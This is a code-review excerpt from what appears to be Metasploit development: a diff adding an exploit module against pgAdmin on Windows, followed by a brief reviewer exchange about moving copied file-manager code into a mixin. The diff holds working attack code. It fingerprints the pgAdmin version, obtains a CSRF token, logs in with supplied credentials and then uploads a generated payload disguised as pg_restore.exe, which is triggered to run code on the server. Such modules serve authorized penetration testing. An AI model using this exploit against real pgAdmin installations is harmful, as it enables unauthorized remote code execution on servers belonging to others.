modules/exploits/windows/http/pgadmin_binary_path_api.rb

```diff
@@ -0,0 +1,228 @@
+    end
+  end
+
+  def auth_required?
+    res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'keep_cookies' => true)
+    if res&.code == 302 && res.headers['Location']['login']
+      true
+    elsif res&.code == 302 && res.headers['Location']['browser']
+      false
+    end
+  end
+
+  def get_version
+    if auth_required?
+      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
+    else
+      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/'), 'keep_cookies' => true)
+    end
+    html_document = res.get_html_document
+    return unless html_document && html_document.xpath('//title').text == 'pgAdmin 4'
+
+    # there's multiple links in the HTML that expose the version number in the [X]XYYZZ,
+    # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27
+    versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ }
+    return unless versioned_link
+
+    Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}")
+  end
+
+  def csrf_token
+    return @csrf_token if @csrf_token
+
+    if auth_required?
+      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
+      set_csrf_token_from_login_page(res)
+    else
+      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true)
+      set_csrf_token_from_config(res)
+    end
+    fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token
+    @csrf_token
+  end
+
+  def exploit
+    if auth_required? && !(datastore['USERNAME'].present? && datastore['PASSWORD'].present?)
+      fail_with(Failure::BadConfig, 'Application requires authentication, provide credentials!')
+    end
+
+    if auth_required?
+      res = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'authenticate/login'),
+        'method' => 'POST',
+        'keep_cookies' => true,
+        'vars_post' => {
+          'csrf_token' => csrf_token,
+          'email' => datastore['USERNAME'],
+          'password' => datastore['PASSWORD'],
+          'language' => 'en',
+          'internal_button' => 'Login'
+        }
+      })
+
+      unless res&.code == 302 && res.headers['Location'] != normalize_uri(target_uri.path, 'login')
+        fail_with(Failure::NoAccess, 'Failed to authenticate to pgAdmin')
+      end
+
+      print_status('Successfully authenticated to pgAdmin')
+    end
+
+    file_name = 'pg_restore.exe'
+    file_manager_upload_and_trigger(file_name, generate_payload_exe)
+  rescue ::Rex::ConnectionError
+    fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+  end
+
+  # file manager code is copied from pgadmin_session_deserialization module
```

Comment:
Should it be factorized into a mixin instead of being copy-pasted?

Reply:
This isn't a blocker for me, when the third module comes along it'll be easy to extract out a useful mixin IMO